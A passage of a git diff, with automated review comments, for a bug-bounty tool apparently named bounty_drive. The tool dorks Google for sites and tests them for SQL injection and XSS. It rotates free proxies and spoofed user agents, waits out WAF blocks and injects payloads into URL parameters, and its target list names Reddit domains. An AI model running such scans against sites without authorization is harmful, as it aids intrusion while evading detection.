do_dorking_github, do_sqli, do_xss = get_user_input() - - proxies = setup_proxies() - cprint("Number of proxies: " + str(len(proxies)), 'green', file=sys.stderr) - + ( + extension, + do_dorking_google, + do_dorking_github, + do_sqli, + do_xss, + use_proxy, + ) = get_user_input() + + for key, value in VULN_PATHS.items(): + if not os.path.exists(value[0]): + with open(value[0], "w") as file: + file.write("") + for key, value in POTENTIAL_PATHS.items(): + if not os.path.exists(value[0]): + with open(value[0], "w") as file: + file.write("") + with open(value[0].replace(".txt", "_dork.txt"), "w") as file: + file.write("") + + proxies = [None] + if use_proxy: + proxies = setup_proxies() + cprint("Number of proxies: " + str(len(proxies)), "green", file=sys.stderr) + if do_dorking_google: - cprint("\nStarting Google dorking scan phase...\n", 'yellow', file=sys.stderr) + cprint( + "\nStarting Google dorking scan phase...\n", "yellow", file=sys.stderr + ) load_google_dorks_and_search(extension, proxies) - + if do_dorking_github: - cprint("\nStarting Github dorking scan phase...\n", 'yellow', file=sys.stderr) + cprint( + "\nStarting Github dorking scan phase...\n", "yellow", file=sys.stderr + ) raise NotImplementedError("Github dorking scan phase not implemented yet") - load_github_dorks_and_search(extension, proxies) - + load_github_dorks_and_search(extension, proxies) + def read_potential_sites(): for key, value in POTENTIAL_PATHS.items(): - if not os.path.exists(value[0]): - with open(value[0], 'w') as file: - file.write('') - with open(value[0], 'r') as file: + with open(value[0], "r") as file: POTENTIAL_PATHS[key][1] = list(set(file.read().splitlines())) # Call the function to initialize the arrays read_potential_sites() - + if do_sqli: raise NotImplementedError("SQLi phase not implemented yet") website_to_test = POTENTIAL_PATHS["sqli"][1] - cprint("\nTesting websites for SQL injection vulnerability...\n", 'yellow', file=sys.stderr) + cprint( + "\nTesting websites for 
SQL injection vulnerability...\n", + "yellow", + file=sys.stderr, + ) if not website_to_test: - cprint("No websites found matching the dorks. Please adjust your search criteria.", 'red', file=sys.stderr) + cprint( + "No websites found matching the dorks. Please adjust your search criteria.", + "red", + file=sys.stderr, + ) test_vulnerability_sqli(proxies) - + if do_xss: website_to_test = POTENTIAL_PATHS["xss"][1] - cprint("\nTesting websites for XSS vulnerability...\n", 'yellow', file=sys.stderr) + cprint( + "\nTesting websites for XSS vulnerability...\n", + "yellow", + file=sys.stderr, + ) if not website_to_test: - cprint("No websites found matching the dorks. Please adjust your search criteria.", 'red', file=sys.stderr) + cprint( + "No websites found matching the dorks. Please adjust your search criteria.", + "red", + file=sys.stderr, + ) test_vulnerability_xss(proxies) - - cprint(banner_terminal_res , 'green', file=sys.stderr) + + cprint(banner_terminal_res, "green", file=sys.stderr) if do_sqli and VULN_PATHS["sqli"][1]: raise NotImplementedError("SQLi phase not implemented yet") - cprint("The following targets are affected with SQLi:", "red", file=sys.stderr) - for target in VULN_PATHS["sqli"][1]: + cprint( + "The following targets are affected with SQLi:", "red", file=sys.stderr + ) + for target in VULN_PATHS["sqli"][1]: cprint(target, "red", file=sys.stderr) - + if do_xss and VULN_PATHS["xss"][1]: - cprint("The following targets are affected with XSS:", "red", file=sys.stderr) - for target in VULN_PATHS["xss"][1]: + cprint( + "The following targets are affected with XSS:", "red", file=sys.stderr + ) + for target in VULN_PATHS["xss"][1]: cprint(target, "red", file=sys.stderr) - + finally: sys.stderr = orig_stdout - f.close() \ No newline at end of file + f.close() diff --git a/bounty_drive/target.txt b/bounty_drive/target.txt index 10424af..46fa6ec 100644 --- a/bounty_drive/target.txt +++ b/bounty_drive/target.txt 
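Review bot: In `get_user_arguments_input`, `use_proxy = args.use_proxy` leaves the flag as the raw string, unlike every other flag, which is compared with `"true"`. Because `"false"` is a non-empty string, the later `if use_proxy:` in the `__main__` block is always true and `--use_proxy false` still calls `setup_proxies()`. It should read `use_proxy = args.use_proxy.lower() == "true"`. The `--use_proxy` help text in the preceding hunk is also a copy of the `--subdomain` one. The body of `get_user_arguments_input` starts above this hunk.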
@@ -1 +1,9 @@ -microsoft.com \ No newline at end of file +reddit.com +snooguts.net +redd.it +redditblog.com +redditmedia.com +redditstatic.com +reddituploads.com +redditinc.com +reddithelp.com \ No newline at end of file diff --git a/bounty_drive/utils/app_config.py b/bounty_drive/utils/app_config.py index 226ce93..d08c09d 100644 --- a/bounty_drive/utils/app_config.py +++ b/bounty_drive/utils/app_config.py 
@@ -1,84 +1,87 @@ - ######################################################################################### # Global variables ######################################################################################### # PATH -GITHUB_FILE_PATH = "reports/potential_github_sites.txt" -SQLI_FILE_PATH = "reports/potential_sqli_sites.txt" -XSS_FILE_PATH = "reports/potential_xss_sites.txt" -API_FILE_PATH = "reports/potential_api_sites.txt" -WEB_FILE_PATH = "reports/potential_web_sites.txt" -SECRET_FILE_PATH = "reports/potential_secret_sites.txt" -DLPHP_FILE_PATH = "reports/potential_dlphp_sites.txt" -BACKUP_FILE_PATH = "reports/potential_backup_sites.txt" +GITHUB_FILE_PATH = "reports/potential_github_sites.txt" +SQLI_FILE_PATH = "reports/potential_sqli_sites.txt" +XSS_FILE_PATH = "reports/potential_xss_sites.txt" +API_FILE_PATH = "reports/potential_api_sites.txt" +WEB_FILE_PATH = "reports/potential_web_sites.txt" +SECRET_FILE_PATH = "reports/potential_secret_sites.txt" +PHP_FILE_PATH = "reports/potential_dowload-php_sites.txt" +BACKUP_FILE_PATH = "reports/potential_backup_sites.txt" POTENTIAL_PATHS = { - "github": [GITHUB_FILE_PATH,[]], - "sqli": [SQLI_FILE_PATH,[]], - "xss": [XSS_FILE_PATH,[]], - "api": [API_FILE_PATH,[]], - "web": [WEB_FILE_PATH,[]], - "secret": [SECRET_FILE_PATH,[]], - "dlphp": [DLPHP_FILE_PATH,[]], - "backup": [BACKUP_FILE_PATH,[]] + "github": [GITHUB_FILE_PATH, set()], + "sqli": [SQLI_FILE_PATH, set()], + "xss": [XSS_FILE_PATH, set()], + "api": [API_FILE_PATH, set()], + "web": [WEB_FILE_PATH, set()], + "secret": [SECRET_FILE_PATH, set()], + "dowload-php": [PHP_FILE_PATH, set()], + "backup": [BACKUP_FILE_PATH, set()], } -VULN_SQLI_FILE_PATH = "reports/vulnerable_sqli_sites.txt" -VULN_XSS_FILE_PATH = "reports/vulnerable_xss_sites.txt" -VULN_API_FILE_PATH = "reports/vulnerable_api_sites.txt" -VULN_WEB_FILE_PATH = "reports/vulnerable_web_sites.txt" -VULN_SECRET_FILE_PATH = "reports/vulnerable_secret_sites.txt" -VULN_DLPHP_FILE_PATH = 
"reports/vulnerable_dlphp_sites.txt" -VULN_BACKUP_FILE_PATH = "reports/vulnerable_backup_sites.txt" +VULN_SQLI_FILE_PATH = "reports/vulnerable_sqli_sites.txt" +VULN_XSS_FILE_PATH = "reports/vulnerable_xss_sites.txt" +VULN_API_FILE_PATH = "reports/vulnerable_api_sites.txt" +VULN_WEB_FILE_PATH = "reports/vulnerable_web_sites.txt" +VULN_SECRET_FILE_PATH = "reports/vulnerable_secret_sites.txt" +VULN_PHP = "reports/vulnerable_dowload-php_sites.txt" +VULN_BACKUP_FILE_PATH = "reports/vulnerable_backup_sites.txt" VULN_PATHS = { - "sqli": [VULN_SQLI_FILE_PATH,[]], - "xss": [VULN_XSS_FILE_PATH,[]], - "api": [VULN_API_FILE_PATH,[]], - "web": [VULN_WEB_FILE_PATH,[]], - "secret": [VULN_SECRET_FILE_PATH,[]], - "dlphp": [VULN_DLPHP_FILE_PATH,[]], - "backup": [VULN_BACKUP_FILE_PATH,[]] + "sqli": [VULN_SQLI_FILE_PATH, set()], + "xss": [VULN_XSS_FILE_PATH, set()], + "api": [VULN_API_FILE_PATH, set()], + "web": [VULN_WEB_FILE_PATH, set()], + "secret": [VULN_SECRET_FILE_PATH, set()], + "dowload-php": [VULN_PHP, set()], + "backup": [VULN_BACKUP_FILE_PATH, set()], } # Constants for handling requests and delays -DEFAULT_EXTENSION = "" -EXTENSION = "" -DEFAULT_TOTAL_OUTPUT = 10 # TODO enforce -TOTAL_OUTPUT = 10 -DEFAULT_PAGE_NO = 1 -PAGE_NO = 1 -LANG ="en" -RECURSIVE = True +DEFAULT_EXTENSION = "" +EXTENSION = "" +DEFAULT_TOTAL_OUTPUT = 10 # TODO enforce +TOTAL_OUTPUT = 10 +DEFAULT_PAGE_NO = 1 +PAGE_NO = 1 +LANG = "en" +RECURSIVE = True USER_AGENTS = [ - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15', - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0', - 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 
Safari/604.1', - 'Mozilla/5.0 (iPad; CPU OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (Linux; Android 10; SM-A505FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Mobile Safari/537.36', - 'Mozilla/5.0 (Linux; Android 10; SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Mobile Safari/537.36', - 'Mozilla/5.0 (Linux; U; Android 10; en-us; Redmi Note 9 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36', - 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36', - 'Mozilla/5.0 (X11; CrOS x86_64 13729.56.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36', - 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36', - 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36', - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36', - 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (iPad; CPU OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1', - 'Mozilla/5.0 (Linux; Android 11; Pixel 4 XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Mobile Safari/537.36' + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", 
+ "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", + "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36", + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36", + "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)", + "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)", + "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)", + "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)", + "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", + "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", + "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)", + "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET 
CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)", ] + # Initial delay and the factor by which the delay is multiplied -INITIAL_DELAY = 10 # Start with a 10-second delay -DELAY_FACTOR = 2 # Double the delay each time -MAX_DELAY = 600 # Maximum delay of 10 minutes -REQUEST_DELAY = 5 # Base delay between requests in seconds -WAF_DELAY = 600 # Delay for WAF detection in seconds +INITIAL_DELAY = 2 # Start with a 10-second delay +DELAY_FACTOR = 2 # Double the delay each time +MAX_DELAY = 600 # Maximum delay of 10 minutes +REQUEST_DELAY = 15 # Base delay between requests in seconds +WAF_DELAY = 600 # Delay for WAF detection in seconds -CURRENT_DELAY = INITIAL_DELAY # TODO add backoff timer \ No newline at end of file +CURRENT_DELAY = INITIAL_DELAY # TODO add backoff timer diff --git a/bounty_drive/utils/banner.py b/bounty_drive/utils/banner.py index 30e8e20..8dc76d7 100644 --- a/bounty_drive/utils/banner.py +++ b/bounty_drive/utils/banner.py 
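Review bot: The second element of every `POTENTIAL_PATHS` and `VULN_PATHS` entry becomes a `set()` here, but `read_potential_sites()` in the main script still assigns `list(set(file.read().splitlines()))` to `POTENTIAL_PATHS[key][1]`. Any later `.add(url)` on such an entry would raise `AttributeError`, so that call site should assign `set(file.read().splitlines())` to keep one container type. The comment on `INITIAL_DELAY = 2` still says "Start with a 10-second delay" and should read `# Start with a 2-second delay`. The new key is spelled `"dowload-php"`; if `"download-php"` was intended, it is cheaper to fix before report file names depend on it.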
@@ -8,72 +8,72 @@ # Animation ######################################################################################### -banner_res = (""" +banner_res = """ ___ ____ / _ \___ ___ __ __/ / /____ / , _/ -_|_-</ // / / __(_-< /_/|_|\__/___/\_,_/_/\__/___/ ***************************** - - """) + + """ banner_terminal_res = terminal_banner.Banner(banner_res) - + + def load_animation(): - banner = (""" - + banner = """ + ▄▄▄▄· ▄• ▄▌ ▐ ▄ ▄▄▄▄▄ ▄· ▄▌·▄▄▄▄ ▄▄▄ ▪ ▌ ▐·▄▄▄ . ▐█ ▀█▪▪ █▪██▌•█▌▐█•██ ▐█▪██▌██▪ ██ ▀▄ █·██ ▪█·█▌▀▄.▀· ▐█▀▀█▄ ▄█▀▄ █▌▐█▌▐█▐▐▌ ▐█.▪▐█▌▐█▪▐█· ▐█▌▐▀▀▄ ▐█·▐█▐█•▐▀▀▪▄ ██▄▪▐█▐█▌.▐▌▐█▄█▌██▐█▌ ▐█▌· ▐█▀·.██. ██ ▐█•█▌▐█▌ ███ ▐█▄▄▌ -·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀▀ █▪ ▀▀▀ ▀ • ▀▀▀▀▀• .▀ ▀▀▀▀. ▀ ▀▀▀ - - Made with ❤️ - For the Community, By the Community +·▀▀▀▀ ▀█▄▀▪ ▀▀▀ ▀▀ █▪ ▀▀▀ ▀ • ▀▀▀▀▀• .▀ ▀▀▀▀. ▀ ▀▀▀ + + Made with ❤️ + For the Community, By the Community ################################### Made by ElNiak -linkedin - https://www.linkedin.com/in/christophe-crochet-5318a8182/ +linkedin - https://www.linkedin.com/in/christophe-crochet-5318a8182/ Github - https://github.com/elniak - - """) - banner_terminal = terminal_banner.Banner(banner) - cprint(banner_terminal , 'green', file=sys.stderr) - - load_str = "Preparing the Dorking Pentesting...." 
- ls_len = len(load_str) - - animation = "|/-\\" - anicount = 0 - counttime = 0 - i = 0 - while (counttime != 100): - time.sleep(0.075) - load_str_list = list(load_str) - x = ord(load_str_list[i]) - y = 0 - if x != 32 and x != 46: - if x>90: - y = x-32 - else: - y = x + 32 - load_str_list[i]= chr(y) - - res ='' - for j in range(ls_len): - res = res + load_str_list[j] - - sys.stdout.write("\r"+res + animation[anicount]) - sys.stdout.flush() - - load_str = res - - anicount = (anicount + 1)% 4 - i =(i + 1)% ls_len - counttime = counttime + 1 - - if os.name =="nt": - os.system("cls") - - else: - os.system("clear") - \ No newline at end of file + + """ + banner_terminal = terminal_banner.Banner(banner) + cprint(banner_terminal, "green", file=sys.stderr) + + load_str = "Preparing the Dorking Pentesting...." + ls_len = len(load_str) + + animation = "|/-\\" + anicount = 0 + counttime = 0 + i = 0 + while counttime != 100: + time.sleep(0.040) + load_str_list = list(load_str) + x = ord(load_str_list[i]) + y = 0 + if x != 32 and x != 46: + if x > 90: + y = x - 32 + else: + y = x + 32 + load_str_list[i] = chr(y) + + res = "" + for j in range(ls_len): + res = res + load_str_list[j] + + sys.stdout.write("\r" + res + animation[anicount]) + sys.stdout.flush() + + load_str = res + + anicount = (anicount + 1) % 4 + i = (i + 1) % ls_len + counttime = counttime + 1 + + if os.name == "nt": + os.system("cls") + + else: + os.system("clear") diff --git a/bounty_drive/utils/proxies.py b/bounty_drive/utils/proxies.py index ee22aeb..985f081 100644 --- a/bounty_drive/utils/proxies.py +++ b/bounty_drive/utils/proxies.py 
@@ -10,39 +10,43 @@ from termcolor import cprint import concurrent.futures from tqdm import tqdm -import sys +import sys + def round_robin_proxies(proxies): return itertools.cycle(proxies) - + + # Function to check if a proxy is up def is_proxy_alive(proxy): try: - response = requests.get('http://www.google.com', - proxies={"http": proxy, "https": proxy}, timeout=5, verify=False) + response = requests.get( + "http://www.google.com", + proxies={"http": proxy, "https": proxy}, + timeout=5, + verify=True, + ) return response.status_code == 200, proxy except requests.RequestException: return False, proxy - + + # Load proxies from file def load_proxies(file="proxies/free-proxy-list.txt"): - with open(file, 'r') as file: + with open(file, "r") as file: return [line.strip() for line in file if line.strip()] - + + def setup_proxies(): proxies = load_proxies() proxies_cp = proxies.copy() - dead_proxies = 0 - total_proxies = len(proxies) - - + dead_proxies = 0 + total_proxies = len(proxies) + lock = threading.Lock() with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor: future_to_search = { - executor.submit( - is_proxy_alive, proxy - ): proxy - for proxy in proxies_cp + executor.submit(is_proxy_alive, proxy): proxy for proxy in proxies_cp } for future in tqdm( concurrent.futures.as_completed(future_to_search), @@ -50,15 +54,19 @@ def setup_proxies(): desc="Checking proxies", unit="proxy", leave=True, - position=0 + position=0, ): result = future.result() if result: with lock: if not result[0]: dead_proxies += 1 - cprint(f"Removing dead proxy {result[1]}, dead proxies {dead_proxies}/{total_proxies}", 'red', file=sys.stderr) + cprint( + f"Removing dead proxy {result[1]}, dead proxies {dead_proxies}/{total_proxies}", + "red", + file=sys.stderr, + ) proxies.remove(result[1]) cprint(f"Up proxies: {len(proxies)}") - - return proxies \ No newline at end of file + + return proxies 
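Review bot: `verify=True` in `is_proxy_alive` has no effect on the probe as written, because the URL is `http://www.google.com` and no TLS handshake takes place unless the response redirects to HTTPS. A proxy that cannot tunnel HTTPS, or that alters plain-HTTP traffic, can therefore still be reported alive and then be handed to the HTTPS requests. Probing `"https://www.google.com"` would make the liveness check exercise the same path and certificate validation as the real traffic. Separately, `load_proxies` rebinds its `file` parameter to the open handle in `with open(file, "r") as file:`; a distinct name such as `fh` would read more clearly.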
diff --git a/bounty_drive/utils/request_manager.py b/bounty_drive/utils/request_manager.py index 4f9c009..26b4245 100644 --- a/bounty_drive/utils/request_manager.py +++ b/bounty_drive/utils/request_manager.py @@ -1,4 +1,5 @@ import json +import re import sys import time from urllib.parse import parse_qs, urlparse @@ -7,7 +8,7 @@ import requests from termcolor import cprint -from utils.app_config import WAF_DELAY +from utils.app_config import CURRENT_DELAY, INITIAL_DELAY, REQUEST_DELAY, WAF_DELAY class SearchResult: @@ -24,6 +25,7 @@ def __repr__(self): def has_query_string(url): return bool(urlparse.urlparse(url).query) + # Function to inject a payload into a given URL def inject_payload(url, payload): if has_query_string(url): @@ -37,6 +39,22 @@ def inject_payload(url, payload): url += f"{payload}" return url + +def inject_params(url, payload): + """ + Injects the payload in the parameters and returns a set + """ + injected_url = set() + temp_payload = ( + payload.replace("\\n", "$").replace("\\t", "@").replace("\\r", "!") + ) # saves the payload from the removal of \\n, \\t and \\r + injected = re.sub(r"=[^?\|&]*", "=" + str(temp_payload), str(url)) + final_payload = injected.replace("$", "\\n").replace("@", "\\t").replace("!", "\\r") + injected_url.add(final_payload) + + return injected_url + + def param_converter(data, url=False): if "str" in str(type(data)): if url: 
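Review bot: `inject_params` passes the payload to `re.sub` as a replacement template, so `re` interprets any backslash escape or group reference in it. The `$`/`@`/`!` placeholder swap protects only the two-character sequences `\n`, `\t` and `\r`, and other escapes can raise `re.error`. The closing `.replace("$", "\\n").replace("@", "\\t").replace("!", "\\r")` also runs over the whole URL, so a `$`, `@` or `!` already present in the URL or payload is rewritten. A callable replacement removes the need for placeholders: `injected = re.sub(r"=[^?\|&]*", lambda m: "=" + str(payload), str(url))`. In the context lines above, `has_query_string` calls `urlparse.urlparse(url)` although the file imports the function with `from urllib.parse import parse_qs, urlparse`, so it should be `urlparse(url).query`.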
@@ -62,63 +80,62 @@ def start_request( advanced=False, is_json=False, GET=False, - url=None, data=None, headers=None, params=None, base_url=None, full_query=None, category=None, - get_urls=False, + scrap_urls=False, ): urls = None try: if GET: cprint( - f"Searching for GET: {full_query} ({category}) with proxy {proxies['https']}...", + f"Searching for GET: {base_url} and parameters {params} ({category} and with proxy {proxies['https']}) ...", "yellow", file=sys.stderr, ) response = requests.get( base_url, - data=data, + # data=data[0], headers=headers, params=params, proxies=proxies, - verify=False, - timeout=10, + verify=True, # TODO add parameter for that + timeout=REQUEST_DELAY, ) elif is_json: cprint( - f"Searching for POST + JSON: {full_query} ({category}) with proxy {proxies['https']}...", + f"Searching for POST + JSON: {base_url}/{full_query} with data {data} ({category} and with proxy {proxies['https']}) ...", "yellow", file=sys.stderr, ) response = requests.post( base_url, - json=data, + json=data[0], headers=headers, - timeout=10, - verify=False, + timeout=REQUEST_DELAY, + verify=True, proxies=proxies, ) else: cprint( - f"Searching for POST: {full_query} ({category}) with proxy {proxies['https']}...", + f"Searching for POST: {base_url}/{full_query} with data {data} ({category} and with proxy {proxies['https']}) ...", "yellow", file=sys.stderr, ) response = requests.post( base_url, - data=data, + data=data[0], headers=headers, - timeout=10, - verify=False, + timeout=REQUEST_DELAY, + verify=True, proxies=proxies, ) - # Parse - if get_urls: + # Parse Google response + if scrap_urls: urls = [] soup = BeautifulSoup(response.text, "html.parser") result_block = soup.find_all("div", attrs={"class": "g"}) 
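Review bot: The three new log lines index `proxies['https']` and the POST branches index `data[0]`, but `data` defaults to `None` and the main script now builds `proxies = [None]` when proxying is disabled. If that `None` reaches this function, either expression raises `TypeError` before any request is sent. Guards such as `proxy_label = proxies["https"] if proxies else "direct"` and `body = data[0] if data else None` keep the no-proxy path working. The same messages print `params` and `data` in full to stderr; if those can carry cookies or tokens, log only the keys. The signature of `start_request` begins above this hunk and its body continues below it.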
@@ -130,6 +147,11 @@ def start_request( if description_box: description = description_box.text if link and title and description: + cprint( + f"Link appended to potential urls: {link}", + "yellow", + file=sys.stderr, + ) if advanced: urls.append( SearchResult(link["href"], title.text, description) @@ -140,10 +162,19 @@ def start_request( # Placeholder for URL extraction logic return urls # Return the category and a placeholder result except requests.exceptions.ProtocolError: - cprint("WAF is dropping suspicious requests. Scanning will continue after 10 minutes.", color="red", file=sys.stderr) + cprint( + "WAF is dropping suspicious requests. Scanning will continue after 10 minutes.", + color="red", + file=sys.stderr, + ) time.sleep(WAF_DELAY) except requests.exceptions.RequestException as e: - # cprint(f"Error searching for {full_query} with proxy {proxy}: {e}", 'red', file=sys.stderr) - time.sleep(2) # Wait before retrying + cprint( + f"Error searching for {full_query} with proxy {proxies['https']}: {e}", + "red", + file=sys.stderr, + ) + time.sleep(CURRENT_DELAY) # Wait before retrying + # TODO add backoff timer for delay ? finally: return urls diff --git a/bounty_drive/utils/request_parser.py b/bounty_drive/utils/request_parser.py new file mode 100644 index 0000000..0f007f8 --- /dev/null +++ b/bounty_drive/utils/request_parser.py 
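Review bot: The `finally: return urls` that closes `start_request` discards any exception still propagating, so an error other than `requests.exceptions.RequestException` is dropped and the caller only sees `None`. That includes an error raised by `proxies['https']` inside the new `except` handler. Moving `return urls` to after the `try` statement lets unexpected errors surface. `time.sleep(CURRENT_DELAY)` reads a value copied at import time by `from utils.app_config import CURRENT_DELAY`, so the backoff mentioned in the TODO would not be seen here unless the module attribute is read instead (`app_config.CURRENT_DELAY`). The WAF message hard-codes "10 minutes" while the sleep uses `WAF_DELAY`; formatting the message from the constant keeps them in step.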
@@ -0,0 +1,52 @@ +# -*- coding: utf-8 -*- + +from urllib.parse import parse_qs +from http.cookies import SimpleCookie + + +def parse_post_data(data): + """ + parses the post data + """ + result = parse_qs(data, strict_parsing=True) + for key in result: + if len(result[key]) == 1: + result[key] = result[key][0] + data = result + + return data + + +def parse_cookies(cookies): + """ + converts the raw data to dict + """ + raw_data = cookies + cookie = SimpleCookie() + cookie.load(raw_data) + cookies = {} + for key, morsel in cookie.items(): + cookies[key] = morsel.value + + return cookies + + +def extract_headers(headers): + """ + extracts the headers and returns a dict + """ + headers = headers.replace("\\n", "\n") + return parse_headers(headers) + + +def parse_headers(string): + """ + parses the headers and creates a dict + """ + new_headers = {} + for line in string.split("\n"): + if len(line) > 1: + splitted = line.split(":") + new_headers[splitted[0]] = ":".join(splitted[1:]).strip() + + return new_headers diff --git a/bounty_drive/utils/results_manager.py b/bounty_drive/utils/results_manager.py index 67a4f41..5174451 100644 --- a/bounty_drive/utils/results_manager.py +++ b/bounty_drive/utils/results_manager.py @@ -3,7 +3,7 @@ from termcolor import cprint from utils.app_config import * - + ######################################################################################### # File writing functions ######################################################################################### @@ -18,7 +18,7 @@ "api": threading.Lock(), "web": threading.Lock(), "secret": threading.Lock(), - "dlphp": threading.Lock(), + "dowload-php": threading.Lock(), "backup": threading.Lock(), "github": threading.Lock(), } 
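Review bot: `parse_headers` in the new `request_parser.py` stores a line that has no colon as a header with an empty value, and it never strips header names, because it splits on `:` and strips only the value. Using `name, sep, value = line.partition(":")` and adding the entry only `if sep:` with `new_headers[name.strip()] = value.strip()` handles both cases. `parse_post_data` calls `parse_qs(data, strict_parsing=True)`, which raises `ValueError` on a malformed field. Its docstring should say so, and also that single-valued keys come back as `str` while repeated keys stay lists. The one-line docstrings of `parse_cookies` and `extract_headers` should name the input they expect, which from the code looks like a raw cookie string and header text with literal `\n` separators.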
@@ -26,9 +26,11 @@ # Thread-safe addition to results lists def safe_add_result(result): # TODO category not working, all go to xss - category, urls = result + category, urls, dork = result if urls: - cprint(f"Adding {len(urls)} URLs to {category} list...", 'blue', file=sys.stderr) + cprint( + f"Adding {len(urls)} URLs to {category} list...", "blue", file=sys.stderr + ) for url in urls: if url: if "https://www.google.com/sorry/" not in url: @@ -36,15 +38,40 @@ def safe_add_result(result): with LOCKS["github"]: with open(GITHUB_FILE_PATH, "a") as file: file.write(url + "\n") + with open( + GITHUB_FILE_PATH.replace(".txt", "_dork.txt"), "a" + ) as file: + file.write(dork + "\n") POTENTIAL_PATHS["github"][1].add(url) - cprint(f"Added {url} to github list", 'green', file=sys.stderr) + cprint( + f"Added {url} to github list", "green", file=sys.stderr + ) else: with LOCKS[category]: # Ensure thread-safe write operation - with open(POTENTIAL_PATHS[category][0], "a") as file: # Open file in append mode + with open( + POTENTIAL_PATHS[category][0], "a" + ) as file: # Open file in append mode file.write(url + "\n") # Write URL to file - POTENTIAL_PATHS[category][1].add(url) # Optionally maintain the set - cprint(f"Added {url} to {category} list", 'green', file=sys.stderr) + with open( + POTENTIAL_PATHS[category][0].replace( + ".txt", "_dork.txt" + ), + "a", + ) as file: + file.write(dork + "\n") + POTENTIAL_PATHS[category][1].add( + url + ) # Optionally maintain the set + cprint( + f"Added {url} to {category} list", + "blue", + file=sys.stderr, + ) else: - cprint(f"Google blocked us from accessing {url}", 'red', file=sys.stderr) + cprint( + f"Google blocked us from accessing {url}", + "red", 